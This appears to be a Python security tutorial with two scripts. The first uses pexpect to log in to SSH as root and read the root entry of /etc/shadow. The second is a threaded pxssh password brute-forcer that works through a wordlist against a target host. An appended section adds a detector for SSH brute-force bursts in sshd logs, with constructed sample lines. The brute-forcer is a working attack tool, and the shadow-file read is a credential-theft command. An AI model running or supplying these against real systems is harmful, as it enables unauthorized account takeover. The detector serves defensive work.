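Logging in to SSH with the Pexpect module and brute-forcing SSH passwords with the pxssh module

Interacting through the Pexpect module

This was run on a CentOS system.

Code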

# -*- coding: utf-8 -*-
# @Author  : Lan126

import pexpect

# Regular expressions matching common shell/interpreter prompts
PROMPT = [r"# ", r">>> ", r"> ", r"\$ "]


def connect(user, host, password):
    ssh_newkey = "Are you sure you want to continue connecting"
    connStr = "ssh " + user + "@" + host
    child = pexpect.spawn(connStr)
    # 0 = timeout, 1 = unknown host key prompt, 2 = password prompt
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey, "[pP]assword:"])
    if ret == 0:
        print("[-] Error Connecting")
        return
    if ret == 1:
        child.sendline("yes")
        ret = child.expect([pexpect.TIMEOUT, "[pP]assword:"])
        if ret == 0:
            print("[-] Error Connecting")
            return
    child.sendline(password)
    child.expect(PROMPT)
    return child


def send_command(child, cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    # child.before holds the bytes printed before the prompt matched
    print(child.before.decode("utf-8", errors="replace"))


def main():
    host = "localhost"
    user = "root"
    password = "*************************"
    child = connect(user, host, password)
    if child is None:
        # connect() already reported the error
        return
    send_command(child, "cat /etc/shadow | grep root")


if __name__ == "__main__":
    main()

Details

The following passage, copied from the Pexpect documentation, sums up essentially everything this script relies on:

There are two important methods in Pexpect – expect() and send() (or sendline() which is like send() with a linefeed).
The expect() method waits for the child application to return a given string. The string you specify is a regular expression,
so you can match complicated patterns. The send() method writes a string to the child application.
From the child’s point of view it looks just like someone typed the text from a terminal.
After each call to expect() the before and after properties will be set to the text printed by child application.
The before property will contain all text up to the expected string pattern. The after string will contain the text that was matched by the expected pattern.

The role of the spawn class is as follows:

This is the main class interface for Pexpect. Use this class to start and control child applications.


Brute-forcing SSH passwords with pxssh

This was also run on a CentOS system.

Code

# -*- coding: utf-8 -*-
# @Author  : Lan126

import optparse
from pexpect import pxssh
import time
from threading import BoundedSemaphore, Thread

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0


def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print("[+] Password Found " + password)
        Found = True
    except Exception as e:
        if "read_nonblocking" in str(e):
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif "synchronize with original prompt" in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release:
            connection_lock.release()


def main():
    parser = optparse.OptionParser("usage: %prog -H <target host> -u <user> -F <password list>")
    parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
    parser.add_option("-u", dest="user", type="string", help="specify the user")
    parser.add_option("-F", dest="passwordFile", type="string", help="specify password file")
    options, args = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwordFile
    user = options.user
    if host is None or passwdFile is None or user is None:
        print(parser.usage)
        exit(0)
    fn = open(passwdFile, "r")
    for line in fn.readlines():
        if Found:
            # Exit once the password has been found
            print("[*] Exiting: Password Found")
            exit(0)
        if Fails > 5:
            print("[!] Too Many Socket Timeouts")
            exit(0)
        connection_lock.acquire()
        password = line.strip("\r").strip("\n")
        print("[-] Testing: " + str(password))
        t = Thread(target=connect, args=(host, user, password, True))
        t.start()


if __name__ == "__main__":
    main()

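Details

This is really just a higher-level wrapper around the script above, with the added step of reading a password file.
The points this script covers are global variables, semaphores, and use of the pxssh module, which can interact with ssh directly through functions such as login().
Take a look at the BoundedSemaphore class: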

A bounded semaphore implementation. Inherit from Semaphore.
This raises ValueError in release() if it would increase the value above the initial value.
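
Seen from the server side, a password-guessing run like the one above leaves a burst of "Failed password" entries from one source address in the sshd log (/var/log/secure on CentOS). The following detector is an added example, not part of the original post: it flags any source that reaches a failure threshold inside a sliding window and records logins that succeed afterwards. The sample log lines, host name, addresses, threshold, window and year are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the OpenSSH password-auth log format (host and IPs are made up).
SAMPLE_LOG = """\
Mar  3 10:15:01 web01 sshd[4101]: Failed password for root from 203.0.113.7 port 50001 ssh2
Mar  3 10:15:02 web01 sshd[4102]: Failed password for root from 203.0.113.7 port 50002 ssh2
Mar  3 10:15:03 web01 sshd[4103]: Failed password for root from 203.0.113.7 port 50003 ssh2
Mar  3 10:15:04 web01 sshd[4104]: Failed password for root from 203.0.113.7 port 50004 ssh2
Mar  3 10:15:05 web01 sshd[4105]: Failed password for root from 203.0.113.7 port 50005 ssh2
Mar  3 10:15:06 web01 sshd[4106]: Failed password for root from 203.0.113.7 port 50006 ssh2
Mar  3 10:15:09 web01 sshd[4107]: Accepted password for root from 203.0.113.7 port 50007 ssh2
Mar  3 10:20:00 web01 sshd[4200]: Failed password for invalid user alcie from 198.51.100.20 port 40100 ssh2
Mar  3 10:25:30 web01 sshd[4201]: Failed password for alice from 198.51.100.20 port 40101 ssh2
Mar  3 10:25:40 web01 sshd[4202]: Accepted password for alice from 198.51.100.20 port 40102 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def detect_bruteforce(lines, threshold=5, window_s=60, year=2024):
    """Map each flagged source IP to its peak failure count and any later logins."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    report = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp, outcome, user, ip = m.groups()
        # syslog timestamps carry no year, so the caller supplies one (assumption)
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        fails = recent[ip]
        while fails and ts - fails[0] > window:
            fails.popleft()
        entry = report.setdefault(ip, {"max_fails": 0, "flagged": False, "login_after_burst": []})
        if outcome == "Failed":
            fails.append(ts)
            entry["max_fails"] = max(entry["max_fails"], len(fails))
            entry["flagged"] = entry["flagged"] or len(fails) >= threshold
        elif entry["flagged"]:
            # successful login from a source that already tripped the threshold
            entry["login_after_burst"].append(user)
    return {ip: e for ip, e in report.items() if e["flagged"]}


if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG.splitlines()))
```

A non-empty login_after_burst list is the entry to triage first, since it means a password login succeeded from a source that had just produced a burst of failures.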
